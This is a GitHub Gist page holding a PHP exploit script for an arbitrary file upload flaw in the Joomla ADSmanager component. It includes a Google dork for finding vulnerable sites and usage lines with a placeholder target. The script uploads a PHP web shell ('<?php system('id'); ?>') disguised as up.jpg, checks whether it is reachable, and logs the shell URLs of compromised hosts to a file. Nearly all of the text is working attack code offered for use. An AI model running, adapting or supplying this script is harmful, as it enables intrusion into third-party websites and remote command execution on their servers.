Last active
August 20, 2021 20:11
-
-
Save googleinurl/bacce3142636e50f2148 to your computer and use it in GitHub Desktop.
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| # AUTOR DISCOVERY: Back-DOOR - https://fb.com/Backdoor.ma | |
| # REF: https://ghostbin.com/paste/metta , https://www.youtube.com/watch?v=4PqqBhD6ov4 | |
| # Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability | |
| # TIPE: Arbitrary File Upload | |
| # Google DORK: inurl:/index.php?option=com_adsmanager" | |
| # EXPLOIT: /index.php?option=com_adsmanager&task=upload&tmpl=component | |
| # Tested on: Linux | |
| # EXECUTE: php exploit.php www.alvo.com.br | |
| # EXECUTE: php exploit.php www.alvo.com.br/pasta | |
| # OUTPUT: Exploit_AFU_Joomla.txt | |
| # FILE UPLOAD: up.jpg => code shell: <?php system('id'); ?> | |
| -------------------------------------------------------------------------------- | |
| # AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL | |
| # EMAIL: inurlbr@gmail.com | |
| # Blog: http://blog.inurl.com.br | |
| # Twitter: https://twitter.com/googleinurl | |
| # Fanpage: https://fb.com/InurlBrasil | |
| # Pastebin http://pastebin.com/u/Googleinurl | |
| # GIT: https://github.com/googleinurl | |
| # PSS: http://packetstormsecurity.com/user/googleinurl | |
| # EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro | |
| # YOUTUBE: http://youtube.com/c/INURLBrasil | |
| # PLUS: http://google.com/+INURLBrasil | |
| */ | |
| error_reporting(1); | |
| set_time_limit(0); | |
| ini_set('display_errors', 1); | |
| ini_set('max_execution_time', 0); | |
| ini_set('allow_url_fopen', 1); | |
| ob_implicit_flush(true); | |
| ob_end_flush(); | |
| function __plus() { | |
| ob_flush(); | |
| flush(); | |
| } | |
| function __request($params) { | |
| $objcurl = curl_init(); | |
| curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component"); | |
| curl_setopt($objcurl, CURLOPT_POST, 1); | |
| curl_setopt($objcurl, CURLOPT_HEADER, 1); | |
| curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); | |
| curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@up.jpg", "name" => "up.php")); | |
| curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); | |
| curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0); | |
| curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); | |
| curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); | |
| curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1); | |
| $info['corpo'] = curl_exec($objcurl); | |
| $info['server'] = curl_getinfo($objcurl); | |
| curl_close($objcurl); | |
| $gh = get_headers($params['cmd'], 1); | |
| foreach ($gh as $key => $value) { | |
| echo " [INFO][{$key}]:: {$value}\n"; | |
| } | |
| $_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200')); | |
| echo "--------------------------------------------------------------\n"; | |
| print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n"); | |
| if (strstr($info['corpo'], '"tmpfile" : "up.php"')) { | |
| print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_AFU_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!'); | |
| print "\n [INFO] Successfully Upload!\n"; | |
| } | |
| echo "--------------------------------------------------------------\n"; | |
| } | |
| echo "\n [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability\n\n"; | |
| $params = array('cmd' => "{$argv[1]}/tmp/plupload/up.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); | |
| __request($params) . __plus(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment